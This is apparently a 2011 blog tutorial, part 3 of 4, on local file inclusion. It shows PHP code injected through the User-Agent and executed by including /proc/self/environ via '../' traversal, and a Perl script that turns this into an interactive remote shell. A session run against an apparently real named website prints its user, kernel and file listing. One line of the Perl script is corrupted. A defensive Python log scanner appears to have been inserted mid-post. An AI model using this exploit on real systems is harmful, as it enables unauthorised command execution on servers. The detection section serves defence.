Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request for a PHP page is made, Apache forks (creating a new process) and execs the PHP binary to actually run/interpret the PHP script. As on every *nix system each running process has its own /proc entry, this can be quite useful to us, since it holds a lot of information about the process and the environment it is running in.

More specifically, the file /proc/self/environ of a running PHP process holds something like this (the entries are NUL-separated; they are shown one per line here):
Code:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=webmaster@this.domain
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo
HTTP_KEEP_ALIVE=300
(...)
That "Gentoo" is actually part of my browser's userAgent string, copied by the web server into the environment of the PHP process. So guess what...
Imagine that we change the browser's userAgent to some PHP code and make a request like:
Code:
http://somesite.com/index.php?file=../../../../../proc/self/environ
You guessed right, it works: the PHP system() call in the userAgent is actually executed.
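From the defender's side, the two ingredients of this technique are visible in ordinary web server logs. The following Python is an added example (not from the original post) that scans Apache combined-format access log lines for a parameter that traverses to /proc/self/environ, including URL-encoded, double-encoded and %00-terminated variants, and for a User-Agent carrying a PHP open tag; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl
# Constructed Apache combined-format log lines (not from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [29/Sep/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/2.0.0.4"
203.0.113.8 - - [29/Sep/2011:10:01:09 +0000] "GET /index.php?file=../../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "jcfs<?php phpinfo(); ?>jcfs"
203.0.113.9 - - [29/Sep/2011:10:02:31 +0000] "GET /index.php?file=..%252F..%252F..%252Fproc%252Fself%252Fenviron%2500 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Sep/2011:10:03:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4096 "-" "curl/7.21.0"
"""
# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)  # <?php, <?= or a bare <?

def decode_param(raw):
    """Undo repeated URL-encoding (double encoding is a classic filter bypass); return
    (path as include() would see it, whether a %00 terminator was present)."""
    prev = None
    while prev != raw:
        prev, raw = raw, unquote(raw)
    return raw.split("\x00", 1)[0], "\x00" in raw

def resolve_traversal(path):
    """Collapse ../ segments relative to the web root; surplus ../ stop at /, so any
    long enough chain lands on the same absolute file regardless of web root depth."""
    parts = []
    for seg in path.split("/"):
        if seg == "..":
            if parts: parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)

def analyse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line
    findings = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        path, had_null = decode_param(raw)
        if resolve_traversal(path) == "/proc/self/environ":
            findings.append(f"param {name} resolves to /proc/self/environ")
        if had_null:
            findings.append(f"param {name} carries a null byte")
    if PHP_TAG_RE.search(m["ua"]):
        findings.append("User-Agent contains a PHP open tag")
    return {"ip": m["ip"], "findings": findings}

def scan(log_text):
    return [r for r in map(analyse_line, log_text.splitlines()) if r and r["findings"]]
```

Either finding on its own is worth an alert; both on the same request is the pattern described in this post.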

So, after coding this little Perl script
Code:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];   # vulnerable URL, up to and including the include parameter
my ($line, $response);
# Enough "../" to reach the filesystem root from any web root depth.
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while ( $line = <STDIN> ) {   # one command per line
    chop($line);
    # The PHP tags inside the injected User-Agent were stripped when this post
    # was scraped; the line is kept as it appears in the post.
    $browser->agent("jcfs /dev/stdout");?>jcfs");
    $response = $browser->get( $url );
    # Whatever sits between the two "jcfs" markers in the included environ is the output.
    if ( $response->content =~ /jcfs(.*)jcfs/s ) {
        print $1;
    }
    print "jcfsprompt: ";
}
I tried something like this...

Code:
jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)
